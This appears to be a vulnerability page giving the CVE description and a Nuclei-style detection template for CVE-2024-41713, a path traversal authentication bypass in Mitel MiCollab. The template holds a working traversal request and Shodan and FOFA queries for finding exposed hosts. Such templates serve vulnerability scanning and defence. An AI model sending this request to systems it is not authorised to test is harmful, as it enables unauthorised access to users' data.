A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations.
PoC代码[已公开]
id: CVE-2024-41713
info:
name: Mitel MiCollab - Authentication Bypass
author: DhiyaneshDK,watchTowr
severity: high
description: |
A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations.
reference:
- https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
- https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/?123
- https://nvd.nist.gov/vuln/detail/CVE-2024-41713
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-41713
cwe-id: CWE-22
epss-score: 0.93914
epss-percentile: 0.99872
metadata:
verified: true
max-request: 1
vendor: mitel
product: cmg_suite
shodan-query: http.html:"Mitel Networks"
fofa-query: body="mitel networks"
tags: cve,cve204,mitel,cmg-suite,auth-bypass,kev,vkev
http:
- raw:
- |
GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Available services"
- "Service Description"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402205389d537f8db6214d78cf1097c5ec3e4c21ded3ddce0ead55bd22edf3c30b20f022039e6952758ace1ae1eafe116702168bae203f5d477607202d7a9094b132e589f:922c64590222798bb761d5b6d8e72950